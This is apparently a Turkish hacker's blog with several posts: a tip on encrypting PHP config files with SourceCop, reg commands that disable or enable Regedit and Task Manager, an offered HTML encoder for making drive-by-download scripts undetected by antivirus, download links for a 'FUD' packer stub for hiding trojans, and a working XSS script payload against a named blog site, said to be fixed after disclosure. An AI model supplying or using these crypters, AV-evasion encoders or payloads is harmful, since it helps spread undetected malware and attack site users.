Sh0cK.Net

Akıllı bir web master veya Sunucu yöneticisi, güvenlik konusunda kendini saldırganın yerine koyar ve “Ben olsaydım nereleri didiklerdim?” sorusunu kendisine sorar.Ancak bu şekilde Güvenlik açıklarını kapatabilir.

Düşününki; Listpath ile sunucuya girdiniz..Safe Mod On, Klasör ve Dosya izinleri iyi ayarlanmış.. ( Akıllı Web Master kötü günde belli olur )

Ne komut çalıştırabiliyorsunuz, ne dosya editleyebiliyorsunuz, ne upload yapabiliyorsunuz..Akla ilk gelen Config dosyalarını Okuyup; SQL Sunucusna bağlanıp, tabloları inceleyip çeşitli işlemler yapmaktır.. ( anladık işte niyetiniz kötü )

Hııı? Perm’lerimi ayarladım herşey tamam ama saldırganın Config okumasını engelleyecek bişey yokmu yahu? Sanalda Çareler tükenmez tabiki..
Çare; Source Cop ile Config.php Dosyanı şifrelemek (!)

Geçelim işleme..:

http://www.sourcecop.com/download/sourcecop.exe

Yukarıdan “Source COP” Programımızı indirdikten sonra kurun.. ( Program Deneme sürümü, fakat bizim için ayrıcan crack falan gerekmiyor )

Klasör oluşturup içine şifrelenecek olan config dosyanızı kopyalayın..Bir klasör daha oluşturup, şifrelenmiş dosya(ların) atılacağı klasörü seçin.

“PHP” uzantısını şifreleyeceğimiz için kutucuğu işaretleyin, diğer zımbırtılara dokunmanıza gerek yok.

Ardından “Encrypt” butonuna basarak config dosyamızın şifrelenmesi işlemini başlatıyoruz… Ve işlem tamam…

“scopbin” klasörü ve şifrelenmiş dosyanız üzerinde hiç bir oynama-çizme yapmadan, direk olarak şifreli dosyanızın bulunduğu klasörün içine atın. ( Bazı özürlüler anlamıyor, sonra ağlıyolar.. “Scopbin” klasörü de atılacak ! )

İşlem Tamam.. Artık Config dosyanız şifrelendi, kötü niyetli kavatların biraz daha kıçlarını yırtmaları gerekicek.. ( Öhm,Kırmak 2 dakika alıyor..İstek olursa anlatırım..Bu ölü yerde Olmayacağına göre..Yapacak bi$e yok.. )

Dip Not 1 :  Encode Edilmiş Config Dosyasının  sorunsuz çalışması için sunucunuzda “Zend” zımbırtısı kurulu olmalıdır.
Dip Not 2: Bu işlem sonucunda, %100 garanti veremem..
Dip Not 3: Bu malca anlatımı Sh0cK diye bi şahsiyet hazırlamıştır..Beğenmeyenler okumasın..

Eyvallah..

Etiketler:akıllı web master kötü günde belli olur, asp encoder, Config, config dosyasını okunmaz yapmak, config php encode, kaynak kod, Kullanan, php encoder, php kaynak kod kırma, php kodlarınızı koruyun, php zend, Şifreleme, Sitelerde, source cop decode, source cop ile şifreleme, source cop kırmak, Sql, Sql Kullanan Sitelerde Config Şifreleme, tam anlamıyla site script güvenliği, zend decode

Yararlı Programlarınız için yararlı olabileceğini düşündüğüm ufak bir tüyo..
Ayrıcan; Eğer bu tür bir problemle karşılaşıyorsanız da kullanabilirsiniz.
Komut Satırına veya Başlat>Çalıştır’a yazmanız gerekiyor.( Veya VB’de Shell Execute )

REGEDIT.exe Devre Dışı Bırakmak İçin Kullanacağınız kod;

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f

REGEDIT.exe Etkinleştirmek etmek için;

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

~~

Görev Yöneticisi Devre Dışı Bırakmak;

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

Görev Yöneticisini Etkinleştirmek;

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f

Bundan sonra böyle arada-sırada işe yarar dandik ipuçları vermeyi planlıyorum..
İşinize Yaraması Umuduyla..Selametle.

Sh0cK

Etiketler:görev yöneticisi ve regedit kilitlendi ne yapmalıyım, regedit kiliti açmak, regedit kodları, taskmanager regedit disabled, taskmgr kilitlemek

Antilerinize takılan HTML veya Script Kodlarınzı (HTML DriveByDownload) kolayca Şifreleyip UNDETECT etmek için kullanabilirsiniz.

Kullanmak için : http://sh0ck.net/encoder.html

Etiketler:h4cksh0p encoder, html crypter, html driveby download, html fud yapmak, html script encoder, ie downloader, mozilla downloader fud, opera html downloader, script html şifreleyici, sh0ck.net encoder, sh0cks html encoder

Sh0cK Packer Stub Date : 14 November 2009
Download:

http://rapidshare.com/files/307341430/Sh0cK_Packer_v1.3__14_November_2009_.rar

Alternatif:

http://www.2shared.com/file/9445115/8f0cc1e9/Sh0cK_Packer_v13__14_November_.html

Rar Password:

http://sh0ck.net

If You Don’t like that shit, Don’t Use..
Scan Reports: 3/25
http://virus-trap.org/index.php?a=d3ef855d7dc4a62ead3ffa243cee12ee329e3647

Eyv.

Etiketler:antilerden trojan kaçırma, crypter service, fud, fud crypter, fud packer, Home Of Sh0cK, new fud stub, novirusthanks, sh0ck packer, sh0ck packer 1.2.0, sh0ck's crypter service, tanınmaz trojan, virüsler, virüsü tanınmaz yap

Bloxoo’yu gezerken.. Bi deneme yapayım dedim.. Tuttu..

Bug Adres :
http://www.bloxoo.com/BloxooFrame.aspx?blogid=22279&blogUrl=sh0ck.net%2Fsevilemeyen-ben”><script>alert(/Sh0cK Was Here !/)</script>

Bug Tespit Tarihi : 12 Kasım 2009 – 10 : 40 Civarı..
Bug Fix Tarihi : 13 Kasım 2009 – 20 : 00 Civarı

Açık Tamir (Fix) Edilmeden Yayınlamayı (Publish) etmeyi uygun görmedim.
Gereken Bilgilendirmeyi Mail Yolu ile yaptım:

Sağolsun, hemen ilgilendiler..Böyle ilgili Site yöneticileri olması beni sevindirdi.
XSSED Kaydı : Henüz Onaylanmadı.
Şuan XSS Bug’u Fixlenmiştir.Bo$a Kıçınızı yırtmayın.

Teşekkürler..

Etiketler:bloxoo xssed by sh0ck, xss, xss bugtrack